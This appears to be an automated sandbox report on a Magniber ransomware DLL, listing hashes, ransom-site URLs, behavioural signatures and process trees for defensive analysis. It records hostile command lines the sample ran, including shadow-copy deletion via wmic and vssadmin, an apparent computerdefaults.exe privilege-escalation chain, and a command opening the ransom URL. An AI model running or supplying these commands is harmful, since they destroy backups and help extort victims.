Analysis
- max time kernel: 146s
- max time network: 126s
- platform: windows10_x64
- resource: win10-en-20211104
- submitted: 09-11-2021 06:19

Static task: static1
Behavioral task: behavioral1
- Sample: xnfipyy.inf.dll
- Resource: win7-en-20211014
Behavioral task: behavioral2
- Sample: xnfipyy.inf.dll
- Resource: win10-en-20211104

General
- Target: xnfipyy.inf.dll
- Size: 38KB
- MD5: 18ff6706dac4cda1c85afa02495f4149
- SHA1: a9b70524165713bcb147ca22c95475c091232904
- SHA256: 4889479cc52b989f745d78a483c62fabaa70e7f078a82a5656c8a454e599bac5
- SHA512: d3c2ae6497eeaa323544e72a39d3dfe95a5701054944cf09307cfc2b6e70011ea93035e1523739af3a8b39022b7fe3ca7ebc95493731b4184132f2ae783582d9
Malware Config
- Extracted: C:\Users\Admin\Desktop\readme.txt
- Family: magniber
- URLs:
  http://62c4684026f46e107cdujyxylz.w3disbrllt7cfknxuutwevchixw5vbyc4ujvg5cz3u57nryezwqgwnad.onion/dujyxylz
  http://62c4684026f46e107cdujyxylz.wonsre.space/dujyxylz
  http://62c4684026f46e107cdujyxylz.wheelgo.sbs/dujyxylz
  http://62c4684026f46e107cdujyxylz.fitsbus.uno/dujyxylz
  http://62c4684026f46e107cdujyxylz.amlack.quest/dujyxylz
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe, cmd.exe, vssadmin.exe
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2712 | 3816 | cmd.exe | 81
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2156 | 3816 | cmd.exe | 81
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2756 | 3816 | vssadmin.exe | 81
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: rundll32.exe
description | ioc | Process
File opened for modification | C:\Users\Admin\Pictures\InvokeSelect.tiff | rundll32.exe
File renamed | C:\Users\Admin\Pictures\InvokeSelect.tiff => C:\Users\Admin\Pictures\InvokeSelect.tiff.dujyxylz | rundll32.exe
File opened for modification | C:\Users\Admin\Pictures\ResolveExport.tiff | rundll32.exe
File renamed | C:\Users\Admin\Pictures\ResolveExport.tiff => C:\Users\Admin\Pictures\ResolveExport.tiff.dujyxylz | rundll32.exe
File renamed | C:\Users\Admin\Pictures\WatchGrant.png => C:\Users\Admin\Pictures\WatchGrant.png.dujyxylz | rundll32.exe
File renamed | C:\Users\Admin\Pictures\JoinStart.raw => C:\Users\Admin\Pictures\JoinStart.raw.dujyxylz | rundll32.exe
File renamed | C:\Users\Admin\Pictures\ResetConnect.raw => C:\Users\Admin\Pictures\ResetConnect.raw.dujyxylz | rundll32.exe
File renamed | C:\Users\Admin\Pictures\SplitComplete.raw => C:\Users\Admin\Pictures\SplitComplete.raw.dujyxylz | rundll32.exe
File renamed | C:\Users\Admin\Pictures\UnblockRepair.crw => C:\Users\Admin\Pictures\UnblockRepair.crw.dujyxylz | rundll32.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: cmd.exe
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation | cmd.exe
-
Suspicious use of SetThreadContext 64 IoCs
Processes: rundll32.exe
-
Drops file in Windows directory 3 IoCs
Processes: MicrosoftEdge.exe, MicrosoftEdgeCP.exe
description | ioc | Process
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe
pid | Process
2756 | vssadmin.exe
-
Modifies Internet Explorer settings 3 IoCs
Processes: MicrosoftEdge.exe, browser_broker.exe, MicrosoftEdgeCP.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
-
Modifies registry class 64 IoCs
Processes: MicrosoftEdge.exe, MicrosoftEdgeCP.exe, rundll32.exe
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes: notepad.exe
pid | Process
2140 | notepad.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes: rundll32.exe
pid | Process
3996 | rundll32.exe
3996 | rundll32.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
2056 |
-
Suspicious behavior: MapViewOfSection 10 IoCs
Processes: rundll32.exe, MicrosoftEdgeCP.exe
pid | Process
3996 | rundll32.exe
3996 | rundll32.exe
3996 | rundll32.exe
3996 | rundll32.exe
3996 | rundll32.exe
3996 | rundll32.exe
3996 | rundll32.exe
3996 | rundll32.exe
2960 | MicrosoftEdgeCP.exe
2960 | MicrosoftEdgeCP.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: wmic.exe, WMIC.exe, WMIC.exe
-
Suspicious use of SetWindowsHookEx 4 IoCs
Processes: MicrosoftEdge.exe, MicrosoftEdgeCP.exe
pid | Process
2056 |
4012 | MicrosoftEdge.exe
2960 | MicrosoftEdgeCP.exe
2960 | MicrosoftEdgeCP.exe
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes: rundll32.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, MicrosoftEdgeCP.exe
description | pid | Process | procid_target
PID 3996 wrote to memory of 2140 | 3996 | rundll32.exe | 70
PID 3996 wrote to memory of 2140 | 3996 | rundll32.exe | 70
PID 3996 wrote to memory of 952 | 3996 | rundll32.exe | 71
PID 3996 wrote to memory of 952 | 3996 | rundll32.exe | 71
PID 3996 wrote to memory of 2340 | 3996 | rundll32.exe | 73
PID 3996 wrote to memory of 2340 | 3996 | rundll32.exe | 73
PID 3996 wrote to memory of 2264 | 3996 | rundll32.exe | 78
PID 3996 wrote to memory of 2264 | 3996 | rundll32.exe | 78
PID 3996 wrote to memory of 1156 | 3996 | rundll32.exe | 75
PID 3996 wrote to memory of 1156 | 3996 | rundll32.exe | 75
PID 1156 wrote to memory of 1884 | 1156 | cmd.exe | 79
PID 1156 wrote to memory of 1884 | 1156 | cmd.exe | 79
PID 2264 wrote to memory of 1080 | 2264 | cmd.exe | 80
PID 2264 wrote to memory of 1080 | 2264 | cmd.exe | 80
PID 2156 wrote to memory of 3208 | 2156 | cmd.exe | 90
PID 2156 wrote to memory of 3208 | 2156 | cmd.exe | 90
PID 2712 wrote to memory of 824 | 2712 | cmd.exe | 91
PID 2712 wrote to memory of 824 | 2712 | cmd.exe | 91
PID 2960 wrote to memory of 2724 | 2960 | MicrosoftEdgeCP.exe | 96
PID 2960 wrote to memory of 2724 | 2960 | MicrosoftEdgeCP.exe | 96
PID 2960 wrote to memory of 2724 | 2960 | MicrosoftEdgeCP.exe | 96
PID 2960 wrote to memory of 2724 | 2960 | MicrosoftEdgeCP.exe | 96
PID 2960 wrote to memory of 2724 | 2960 | MicrosoftEdgeCP.exe | 96
PID 2960 wrote to memory of 2724 | 2960 | MicrosoftEdgeCP.exe | 96
Processes
-
C:\Windows\system32\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\xnfipyy.inf.dll,#1
    - Modifies extensions of user files
    - Suspicious use of SetThreadContext
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:3996
    C:\Windows\system32\notepad.exe
        Command line: notepad.exe C:\Users\Public\readme.txt
        - Opens file in notepad (likely ransom note)
        PID:2140
    C:\Windows\system32\cmd.exe
        Command line: cmd /c "start http://62c4684026f46e107cdujyxylz.wonsre.space/dujyxylz^&1^&28731418^&60^&271^&2215063"
        - Checks computer location settings
        PID:952
    C:\Windows\system32\wbem\wmic.exe
        Command line: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
        - Suspicious use of AdjustPrivilegeToken
        PID:2340
    C:\Windows\system32\cmd.exe
        Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        - Suspicious use of WriteProcessMemory
        PID:1156
        C:\Windows\system32\wbem\WMIC.exe
            Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            - Suspicious use of AdjustPrivilegeToken
            PID:1884
    C:\Windows\system32\cmd.exe
        Command line: cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
        - Suspicious use of WriteProcessMemory
        PID:2264
        C:\Windows\system32\wbem\WMIC.exe
            Command line: C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
            - Suspicious use of AdjustPrivilegeToken
            PID:1080
C:\Windows\system32\cmd.exe
    Command line: cmd /c computerdefaults.exe
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    PID:2712
    C:\Windows\system32\ComputerDefaults.exe
        Command line: computerdefaults.exe
        PID:824
C:\Windows\system32\cmd.exe
    Command line: cmd /c computerdefaults.exe
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    PID:2156
    C:\Windows\system32\ComputerDefaults.exe
        Command line: computerdefaults.exe
        PID:3208
C:\Windows\system32\vssadmin.exe
    Command line: vssadmin.exe Delete Shadows /all /quiet
    - Process spawned unexpected child process
    - Interacts with shadow copies
    PID:2756
C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    PID:3404
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:4012
C:\Windows\system32\browser_broker.exe
    Command line: C:\Windows\system32\browser_broker.exe -Embedding
    - Modifies Internet Explorer settings
    PID:2468
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2960
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:2724
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    - Modifies registry class
    PID:2768
Network
MITRE ATT&CK Enterprise v6
Downloads
-
- MD5: e77eb8b3514c271a603f3837ce58c5b8
- SHA1: e8697207ae183d1b0a10c509a0fdd3d61b069ebe
- SHA256: 36fc3611e8ac4d511c034545f2cec1cc85887c58dddba978879366a2385fe0a9
- SHA512: 2690e4efda7df9ba1501b1a675a1118ddcc42fbccd749a61338f504cfaf9aebe03bdc31197d7067da92152c4388cfed61388758214cca4934f9f92ebfb37817d